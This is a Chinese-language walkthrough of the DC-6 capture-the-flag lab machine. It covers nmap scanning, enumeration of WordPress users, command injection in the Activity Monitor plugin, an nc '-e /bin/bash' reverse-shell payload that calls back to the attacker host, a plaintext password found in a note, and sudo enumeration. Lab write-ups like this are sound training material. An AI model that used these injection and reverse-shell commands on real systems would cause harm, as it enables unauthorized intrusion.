root at kali in ~/DC6 $ ip --color address 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host noprefixroute valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 00:0c:29:c1:aa:ea brd ff:ff:ff:ff:ff:ff inet 10.10.8.70/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0 valid_lft 1606sec preferred_lft 1606sec inet6 fe80::b67d:15bc:205b:2eb8/64 scope link noprefixroute valid_lft forever preferred_lft forever
地址探测
使用 Nmap 扫描出一个 IP:10.10.8.18
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
root at kali in ~/DC6 $ nmap -sn -T4 --min-rate 10000 10.10.8.0/24 -oN Nmap_IP_Scan.txt Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-16 09:02 CST Nmap scan report for 10.10.8.1 Host is up (0.00010s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 10.10.8.2 Host is up (0.00011s latency). MAC Address: 00:50:56:EA:61:D3 (VMware) Nmap scan report for 10.10.8.18 Host is up (0.0012s latency). MAC Address: 00:0C:29:6D:8A:D0 (VMware) Nmap scan report for 10.10.8.254 Host is up (0.00026s latency). MAC Address: 00:50:56:F8:65:AC (VMware) Nmap scan report for 10.10.8.70 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 4.44 seconds
端口扫描
扫描开放端口:
1 2 3 4 5 6 7 8 9 10 11 12
root at kali in ~/DC6 $ nmap -p- -sT -T4 --min-rate 10000 10.10.8.18 -oN Nmap_Port_Scan.txt Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-16 09:03 CST Nmap scan report for 10.10.8.18 Host is up (0.00013s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.38 seconds
root at kali in ~/DC6 $ nmap -p22,80 -sV -O -sT -T4 --min-rate 10000 10.10.8.18 -oN Nmap_Server_Scan.txt Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-16 09:03 CST Nmap scan report for 10.10.8.18 Host is up (0.00053s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 80/tcp open http Apache httpd 2.4.25 ((Debian)) MAC Address: 00:0C:29:6D:8A:D0 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.83 seconds
root at kali in ~/DC6 $ nmap --script=vuln -T4 --min-rate 10000 10.10.8.18 -oN Nmap_Vuln_Scan.txt Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-16 09:04 CST Nmap scan report for 10.10.8.18 Host is up (0.00064s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-enum: | /wp-login.php: Possible admin folder | /readme.html: Wordpress version: 2 | /wp-includes/images/rss.png: Wordpress version 2.2 found. | /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found. | /wp-includes/images/blank.gif: Wordpress version 2.6 found. | /wp-includes/js/comment-reply.js: Wordpress version 2.7 found. | /wp-login.php: Wordpress login page. | /wp-admin/upgrade.php: Wordpress login page. |_ /readme.html: Interesting, a readme. | http-wordpress-users: | Username found: admin | Username found: graham | Username found: mark | Username found: sarah | Username found: jens |_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit' MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 35.43 seconds
[!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
搜索一下,Activity Monitor 插件存在 RCE 漏洞,点击 Tools,输入 127.0.0.256 || ls -l:
发现限制了长度,不过无所谓,前端嘛,改一改就行:
执行成功!在 Web 页面执行着太别扭了,用 BurpSuite 抓包执行。
找找靶机是否存在 NC:
确实有,还是 nc.traditional,带 -e 参数的,🐂。
Kali 上开个 NC 尝试反连:
1
127.0.0.1 ; nc 10.10.8.70 4444 -e /bin/bash
1 2 3 4 5 6
root at kali in ~/DC6 $ nc -lvvp 4444 listening on [any] 4444 ... connect to [10.10.8.70] from wordy [10.10.8.18] 47836 id uid=33(www-data) gid=33(www-data) groups=33(www-data)
ok 连上了,提升个 Shell:
1 2 3 4 5 6 7 8
root at kali in ~/DC6 $ nc -lvvp 4444 listening on [any] 4444 ... connect to [10.10.8.70] from wordy [10.10.8.18] 47836 id uid=33(www-data) gid=33(www-data) groups=33(www-data) python -c 'import pty; pty.spawn("/bin/bash")' www-data@dc-6:/var/www/html/wp-admin$
信息收集(2)
主机信息收集比较麻烦,直接用 LinEnum.sh 脚本:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
www-data@dc-6:/var/www/html/wp-admin$ cd /tmp cd /tmp
www-data@dc-6:/tmp$ wget http://10.10.8.70/LinEnum.sh wget http://10.10.8.70/LinEnum.sh --2024-10-16 13:22:05-- http://10.10.8.70/LinEnum.sh Connecting to 10.10.8.70:80... connected. HTTP request sent, awaiting response... 200 OK Length: 46631 (46K) [text/x-sh] Saving to: 'LinEnum.sh'
LinEnum.sh 100%[===================>] 45.54K --.-KB/s in 0s
www-data@dc-6:/tmp$ ls -alR /home/graham > graham_result.txt ls -alR /home/graham > graham_result.txt www-data@dc-6:/tmp$ cat graham_result.txt cat graham_result.txt /home/graham: total 24 drwxr-xr-x 2 graham graham 4096 Apr 26 2019 . drwxr-xr-x 6 root root 4096 Apr 26 2019 .. -rw------- 1 graham graham 5 Apr 26 2019 .bash_history -rw-r--r-- 1 graham graham 220 Apr 24 2019 .bash_logout -rw-r--r-- 1 graham graham 3526 Apr 24 2019 .bashrc -rw-r--r-- 1 graham graham 675 Apr 24 2019 .profile
www-data@dc-6:/tmp$ ls -alR /home/mark > mark_result.txt ls -alR /home/mark > mark_result.txt www-data@dc-6:/tmp$ cat mark_result.txt cat mark_result.txt /home/mark: total 28 drwxr-xr-x 3 mark mark 4096 Apr 26 2019 . drwxr-xr-x 6 root root 4096 Apr 26 2019 .. -rw------- 1 mark mark 5 Apr 26 2019 .bash_history -rw-r--r-- 1 mark mark 220 Apr 24 2019 .bash_logout -rw-r--r-- 1 mark mark 3526 Apr 24 2019 .bashrc -rw-r--r-- 1 mark mark 675 Apr 24 2019 .profile drwxr-xr-x 2 mark mark 4096 Apr 26 2019 stuff
/home/mark/stuff: total 12 drwxr-xr-x 2 mark mark 4096 Apr 26 2019 . drwxr-xr-x 3 mark mark 4096 Apr 26 2019 .. -rw-r--r-- 1 mark mark 241 Apr 26 2019 things-to-do.txt
哦豁,发现一个 things-to-do.txt,查看内容:
1 2 3 4 5 6 7 8 9
www-data@dc-6:/tmp$ cat /home/mark/stuff/things-to-do.txt cat /home/mark/stuff/things-to-do.txt Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens) - Buy present for Sarah's farewell party - Add new user: graham - GSo7isUM1D4 - done - Apply for the OSCP course - Buy new laptop for Sarah's replacement
SUDO 提权(1)
使用 SSH 登录 graham 用户:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
root at kali in ~/DC6 $ ssh graham@10.10.8.18 The authenticity of host '10.10.8.18 (10.10.8.18)' can't be established. ED25519 key fingerprint is SHA256:BiP2AT/3IPc02K9uqH+WQ7eaE/xcImEo/D1R6/0tjBw. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.8.18' (ED25519) to the list of known hosts. graham@10.10.8.18's password: Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. graham@dc-6:~$ id uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)
graham@dc-6:/tmp$ ./LinEnum.sh ######################################################### # Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # version 0.982
[-] Debug Info [+] Thorough tests = Disabled
Scan started at: Wed 16 Oct 14:07:40 AEST 2024 ### SYSTEM ############################################## [-] Kernel information: Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux ...... [+] We can sudo without supplying a password! Matching Defaults entries for graham on dc-6: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6: (jens) NOPASSWD: /home/jens/backups.sh
[+] Possible sudo pwnage! /home/jens/backups.sh ......
ohoh,发现 SUDO 有一个 SUDO 可以执行的命令:
1 2 3 4 5 6 7 8
graham@dc-6:/tmp$ sudo -l Matching Defaults entries for graham on dc-6: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6: (jens) NOPASSWD: /home/jens/backups.sh graham@dc-6:/tmp$ ls -al /home/jens/backups.sh -rwxrwxr-x 1 jens devs 50 Apr 26 2019 /home/jens/backups.sh
简单查看一下,发现 backups.sh 文件可以被 devs 组修改,而 graham 用户就是在 devs 组的。
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.